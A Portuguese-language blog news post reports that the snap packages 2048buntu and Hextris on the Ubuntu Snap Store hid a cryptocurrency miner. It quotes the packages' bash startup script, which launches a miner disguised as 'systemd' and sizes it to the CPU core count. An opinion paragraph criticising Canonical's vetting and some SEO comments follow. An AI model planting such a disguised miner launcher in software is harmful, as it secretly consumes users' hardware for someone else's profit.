Malware encontrado no Ubuntu Snap Store

2 Programas vinham com minerador de criptomoedas em seu código. Ambos já foram removidos da loja.

| Se você apoia nosso site, desative o AdBlock quando visitá-lo, inclusive em Mobile!
Os anúncios são poucos e não invasivos. Se quiser contribuir com nosso trabalho, clique em qualquer banner de sua preferência, exceto dos Parceiros. 
Mais detalhes clicando aqui.

Só porque alguns pacotes estão disponíveis para instalar diretamente do Ubuntu Software Center não os tornam plenamente seguros. Isto é provado por uma recente descoberta de malware em alguns pacotes instantâneos da loja Ubuntu Snaps.

Pelo menos dois dos pacotes snap, 2048buntu e Hextris, enviados para o Ubuntu Snaps Store pelo usuário Nicolas Tomb, continham malware. Todos os pacotes de Nicolas foram removidos da Loja de Snaps do Ubuntu, ” aguardando novas investigações “.

O relatório vem de um bug que menciona que o pacote de snap 2048buntu (e outros pacotes de Nicolas Tomb) continham um minerador de criptomoedas oculto dentro. Você pode ver o script de inicialização abaixo:

#!/bin/bash

currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
 /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
 /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Um aspecto interessante é que Nicolas Tomb usou uma licença proprietária para pelo menos alguns de seus snaps. Por exemplo, o snap 2048buntu foi submetido como proprietário (o jogo em si não foi desenvolvido por Nicolas). O jogo em questão, 2048 , usa uma licença do MIT que permite distribuí-lo como proprietário, sem disponibilizar o código-fonte, contanto que os avisos de direitos autorais sejam mantidos.

Um aviso importante, o Ubuntu Snap Store permite que qualquer um faça o upload de pacotes instantâneos, ao contrário dos pacotes (deb) disponíveis nos repositórios oficiais do Ubuntu. A razão para isso é fornecer uma maior quantidade de pacotes que sejam facilmente instaláveis ​​por todos os seus usuários.

Análise Opinativa

Se o pessoal da Canonical continuar fazendo vista grossa quanto aos apps disponibilizados na Snap Store, eles terão os mesmos problemas vistos na PlayStore da Google, onde temos centenas de aplicativos com toda sorte de malwares disponibilizados para os usuários. Deveriam passar um pente fino tal qual a Apple faz na Apple Store do iPhone, é mais burocrático, mas pelo menos os aplicativos serão devidamente verificados antes de serem liberados para os usuários.

#UrbanCompassPony

Fonte:
HackingBrasil

O desenvolvimento deste site, a manutenção do Servidor de Arquivos Cloud da UNIX Universe (aqui), o desenvolvimento do sistema PigmeOS em parceria com Grupo Bonobo (aqui) e a manutenção da nossa loja de games (aqui) são dispendiosos para quem se dedica a ajudar os usuários deste fantástico universo baseado em UNIX®.

Me comprometo a mensalmente divulgar os usuários que mais nos apoiarem, assim como mostrar um relatório fiscal publicado aqui no site, de para com o quê a verba foi destinada. No momento o maior plano é agariar fundos para adquirir novas licenças e trazer mais games para a nossa loja, assim como continuar o trabalho de trazer mais games para o Linux, sejam eles nativos caso a source esteja disponível, seja para o WINE, desde que mantendo a qualidade de sempre.

Toda e qualquer ajuda será bem vinda!

 

 

2 comentários em “Malware encontrado no Ubuntu Snap Store”

  1. Hello ,

    I saw your tweets and thought I will check your website. Have to say it looks very good!
    I’m also interested in this topic and have recently started my journey as young entrepreneur.

    I’m also looking for the ways on how to promote my website. I have tried AdSense and Facebok Ads, however it is getting very expensive. Was thinking about starting using analytics. Do you recommend it?
    Can you recommend something what works best for you?

    I also want to improve SEO of my website. Would appreciate, if you can have a quick look at my website and give me an advice what I should improve: http://janzac.com/
    (Recently I have added a new page about FutureNet and the way how users can make money on this social networking portal.)

    I have subscribed to your newsletter. 🙂

    Hope to hear from you soon.

    P.S.
    Maybe I will add link to your website on my website and you will add link to my website on your website? It will improve SEO of our websites, right? What do you think?

    Regards
    Jan Zac

    Responder
    • Hi Jan Zac,
      At the moment I just use Google Analytics and Adsense with a strong SEO. To improve your SEO, keep a “100 day challenge”, posting everyday 100 posts through 100 days! At the final of these days, you will be better indexed with Google. I use Yoast SEO too to help me keep a good SEO at my posts.

      I don’t think so it will be a good idea to make links for our websites, b’cuz I foccus on brazillian programmers writting in brazillian portuguese and yours is about finances and how to make money from internet written in English. Sorry about this.

      Regards,
      Nathan

      Responder

Deixe um comentário